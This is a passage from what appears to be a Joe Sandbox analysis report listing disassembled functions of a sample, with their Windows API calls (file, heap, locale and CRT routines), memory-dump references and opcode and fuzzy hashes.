                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID:
                                                                          • API String ID: 1807457897-3916222277
                                                                          • Opcode ID: ed889c85c2f3138e7c699caba94331dd3d7f118c6554330b069276b1d7515d6b
                                                                          • Instruction ID: e3900a12d31d63edf4eba67b300fa41e3dd9142cd8567d328cddfb431f44fa0a
                                                                          • Opcode Fuzzy Hash: ed889c85c2f3138e7c699caba94331dd3d7f118c6554330b069276b1d7515d6b
                                                                          • Instruction Fuzzy Hash: BE4119719042AC9EDF218E289C84BF6BBA9EF45304F1404EDE99A86142D3359A85EF60
                                                                          Function 00F2AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00F2AFDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: String
                                                                          • String ID: LCMapStringEx
                                                                          • API String ID: 2568140703-3893581201
                                                                          • Opcode ID: 437f8aa66473cf5561837795d0a2591742a4bf78369799405c6dc9baff6d8788
                                                                          • Instruction ID: 7c598b643a07dc519134a46b5e400fe7f1f4a63d329a6e135d0bea99f66ef1a4
                                                                          • Opcode Fuzzy Hash: 437f8aa66473cf5561837795d0a2591742a4bf78369799405c6dc9baff6d8788
                                                                          • Instruction Fuzzy Hash: 9D01177250521EBBCF12AF90ED01DEE7F62EF08760F014254FE1465160C636C931BB81
                                                                          Function 00F2AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F2A56F), ref: 00F2AF55
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                          • String ID: InitializeCriticalSectionEx
                                                                          • API String ID: 2593887523-3084827643
                                                                          • Opcode ID: 86ffb83f9687041793b769804ff8f35eabf8c3030952fd535edda3413bb91282
                                                                          • Instruction ID: 4158c1d8875bd2a709da4b24d74c9dd181b704bb14e51f25f14f8e81e0f57a3d
                                                                          • Opcode Fuzzy Hash: 86ffb83f9687041793b769804ff8f35eabf8c3030952fd535edda3413bb91282
                                                                          • Instruction Fuzzy Hash: 45F0E97164A21CBFCF11AF54DC02DAE7F61EF04731F414155FD0856260DA319E10B786
                                                                          Function 00F2ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Alloc
                                                                          • String ID: FlsAlloc
                                                                          • API String ID: 2773662609-671089009
                                                                          • Opcode ID: 2c0142fcd96296cb0a2cb5057f4532158d9cec3bb532355f26aa9e68b934ece6
                                                                          • Instruction ID: b457221e2306351741795c57c280d664a4463f02c2f0a118e4a5ab5d14341047
                                                                          • Opcode Fuzzy Hash: 2c0142fcd96296cb0a2cb5057f4532158d9cec3bb532355f26aa9e68b934ece6
                                                                          • Instruction Fuzzy Hash: 4BE0E571A8632C7BC611FB65EC02A6EBB55DB44731F410299FC0597240CD749E40B6D6
                                                                          Function 00F1EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1EAF9
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID: 3Ro
                                                                          • API String ID: 1269201914-1492261280
                                                                          • Opcode ID: 8708d13f9ffb9b74dd724f551c0f0295adc5defe97a764e3ead66b8ea1385196
                                                                          • Instruction ID: 3f8107f26aa472ea816699788fd1027c223f8b21407a9505a2bf908959ca3472
                                                                          • Opcode Fuzzy Hash: 8708d13f9ffb9b74dd724f551c0f0295adc5defe97a764e3ead66b8ea1385196
                                                                          • Instruction Fuzzy Hash: 01B012C729A0437C310862001D03CBB210CC8C1FB0330C02EFD04D4082DC855C863872
                                                                          Function 00F2BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00F2BA44,?), ref: 00F2B7E6
                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F2BA89,?,00000000), ref: 00F2BC64
                                                                          • GetCPInfo.KERNEL32(00000000,00F2BA89,?,?,?,00F2BA89,?,00000000), ref: 00F2BC77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CodeInfoPageValid
                                                                          • String ID:
                                                                          • API String ID: 546120528-0
                                                                          • Opcode ID: 92aab7dc7641778dceb8cf0f427a0b453111797def34db7235b6f9c00d5aead1
                                                                          • Instruction ID: 54a54ff0a5ef755e49c290353d221f7634efc904f1eefeece7b0d4c7965ffe92
                                                                          • Opcode Fuzzy Hash: 92aab7dc7641778dceb8cf0f427a0b453111797def34db7235b6f9c00d5aead1
                                                                          • Instruction Fuzzy Hash: CB515671E002669EDB20CF75E8816FABBE5EF41320F18446ED8968B251D7389946BB90
                                                                          Function 00F09A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00F09A50,?,?,00000000,?,?,00F08CBC,?), ref: 00F09BAB
                                                                          • GetLastError.KERNEL32(?,00000000,00F08411,-00009570,00000000,000007F3), ref: 00F09BB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID:
                                                                          • API String ID: 2976181284-0
                                                                          • Opcode ID: 1a86647a4b4091dbab06bd6abe986192d790d190c7c2dd96cd6db7fd0a4bdb49
                                                                          • Instruction ID: 037e70a77797ee53569046bec7d9402556cb92f7475f9836727db52843e5f243
                                                                          • Opcode Fuzzy Hash: 1a86647a4b4091dbab06bd6abe986192d790d190c7c2dd96cd6db7fd0a4bdb49
                                                                          • Instruction Fuzzy Hash: EF41B2B1A083058FDB24DF15D94456AB7E5FBD4330F14891DE891832E2E7F4EE44BA51
                                                                          Function 00F2BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F297E5: GetLastError.KERNEL32(?,00F41030,00F24674,00F41030,?,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F297E9
                                                                            • Part of subcall function 00F297E5: _free.LIBCMT ref: 00F2981C
                                                                            • Part of subcall function 00F297E5: SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F2985D
                                                                            • Part of subcall function 00F297E5: _abort.LIBCMT ref: 00F29863
                                                                            • Part of subcall function 00F2BB4E: _abort.LIBCMT ref: 00F2BB80
                                                                            • Part of subcall function 00F2BB4E: _free.LIBCMT ref: 00F2BBB4
                                                                            • Part of subcall function 00F2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00F2BA44,?), ref: 00F2B7E6
                                                                          • _free.LIBCMT ref: 00F2BA9F
                                                                          • _free.LIBCMT ref: 00F2BAD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorLast_abort
                                                                          • String ID:
                                                                          • API String ID: 2991157371-0
                                                                          • Opcode ID: 884c116be913ab70ae616dfd8a105b365c50969edafafdb832a965d42ca8e272
                                                                          • Instruction ID: 66189b74ddf36f8cba5a393ee2cc531346e87098739a7fbb8a0ee1af2be39494
                                                                          • Opcode Fuzzy Hash: 884c116be913ab70ae616dfd8a105b365c50969edafafdb832a965d42ca8e272
                                                                          • Instruction Fuzzy Hash: AF319331904229AFDB10DFA8E941B9D77F5EF40330F254099ED049B2A2EB7A5D41EF50
                                                                          Function 00F01E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F01E55
                                                                            • Part of subcall function 00F03BBA: __EH_prolog.LIBCMT ref: 00F03BBF
                                                                          • _wcslen.LIBCMT ref: 00F01EFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2838827086-0
                                                                          • Opcode ID: 207c8027ef1b805c814d40629b611bb00fed4091d77805dcb1837790ce6fe810
                                                                          • Instruction ID: 36740a7fde724bce62590121555729fa07d2d5fbcdcce9f560867b9a493f18db
                                                                          • Opcode Fuzzy Hash: 207c8027ef1b805c814d40629b611bb00fed4091d77805dcb1837790ce6fe810
                                                                          • Instruction Fuzzy Hash: 77314971D04209AFCF15DF98C945AEEFBF6BF48310F100069E845A7291CB3A5E54EB60
                                                                          Function 00F09DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F073BC,?,?,?,00000000), ref: 00F09DBC
                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F09E70
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlushTime
                                                                          • String ID:
                                                                          • API String ID: 1392018926-0
                                                                          • Opcode ID: dea95cb1bbd075d769e40fd43a193454328ddc328807a58baa6b8a074400db22
                                                                          • Instruction ID: ca418deb3709380f0be55646edf1dfed73aac3385ebd51fa855b6064171c957c
                                                                          • Opcode Fuzzy Hash: dea95cb1bbd075d769e40fd43a193454328ddc328807a58baa6b8a074400db22
                                                                          • Instruction Fuzzy Hash: 0521F03168D246ABC714CF35C891AABBBE8AF91314F08491CF4D583182E369ED4DFB61
                                                                          Function 00F0966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F09F27,?,?,00F0771A), ref: 00F096E6
                                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F09F27,?,?,00F0771A), ref: 00F09716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: cf938af302dcd831dfb89fdfd8982916c24e5f7e7a9ec1b9320eecc9e2f31707
                                                                          • Instruction ID: 81b532c31191cd0d05e7f8c305b5b0c4520d0d5fba2ce1a1700b67655d255d61
                                                                          • Opcode Fuzzy Hash: cf938af302dcd831dfb89fdfd8982916c24e5f7e7a9ec1b9320eecc9e2f31707
                                                                          • Instruction Fuzzy Hash: 3121B0B19083446FE3308A65CC89BA777DCEB49334F000A19F996C25D2D7B9A884B671
                                                                          Function 00F09E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00F09EC7
                                                                          • GetLastError.KERNEL32 ref: 00F09ED4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID:
                                                                          • API String ID: 2976181284-0
                                                                          • Opcode ID: 73d10d6f31f7b7c14567e03bf264e5ac167fdb6f145298156e700efadc95c729
                                                                          • Instruction ID: 36c51f7d77ebe68076ecd4125cb83eefe243385b0807b00b7a107d3c8eb599a7
                                                                          • Opcode Fuzzy Hash: 73d10d6f31f7b7c14567e03bf264e5ac167fdb6f145298156e700efadc95c729
                                                                          • Instruction Fuzzy Hash: CF11E531A08704ABD734C628CC44BA6B7E9AB44370F504A29E562D26D1E7F4ED85F770
                                                                          Function 00F28E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F28E75
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00F41098,00F017CE,?,?,00000007,?,?,?,00F013D6,?,00000000), ref: 00F28EB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocAllocate_free
                                                                          • String ID:
                                                                          • API String ID: 2447670028-0
                                                                          • Opcode ID: 757d83b9e8aa8267be0d93bbff16da8afada4f3689916d30908fb3b886a71708
                                                                          • Instruction ID: 3686cfd96b049b8cacd45602a8f579a2ed3c87091e183898e2be074342522989
                                                                          • Opcode Fuzzy Hash: 757d83b9e8aa8267be0d93bbff16da8afada4f3689916d30908fb3b886a71708
                                                                          • Instruction Fuzzy Hash: 6BF0F632A07A3566DB212AA5BC05F6F37588F81BF0F264126F814AB1A1DF74DD03B1A1
                                                                          Function 00F1109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00F110AB
                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F110B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Process$AffinityCurrentMask
                                                                          • String ID:
                                                                          • API String ID: 1231390398-0
                                                                          • Opcode ID: 366ecaa0db2a845779b8d8e240a501ea2fe50459fa208869b865f34279f916da
                                                                          • Instruction ID: 4af87c75b0185307d48c12689aa466024002b85b7ac2f8572a6855d865923760
                                                                          • Opcode Fuzzy Hash: 366ecaa0db2a845779b8d8e240a501ea2fe50459fa208869b865f34279f916da
                                                                          • Instruction Fuzzy Hash: 83E09272F00149A78F1D87A49C059EB72DEFA482283104179E603D7101F934DEC16660
                                                                          Function 00F0A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A501
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A532
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2673547680-0
                                                                          • Opcode ID: 4881fa1a2b10bc4b23a73834bf1af95be2fc99318c9fcf09c9b13239c9c32359
                                                                          • Instruction ID: d2528511af8cfcf48a90d93f07ea8fd8e1ee33fd564f664f4095a5ddb4f696e3
                                                                          • Opcode Fuzzy Hash: 4881fa1a2b10bc4b23a73834bf1af95be2fc99318c9fcf09c9b13239c9c32359
                                                                          • Instruction Fuzzy Hash: 34F0397225020DBBEF019F60DC45FEA37ADBF0439AF488061B949D61A0DB71DAD8FA50
                                                                          Function 00F0A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
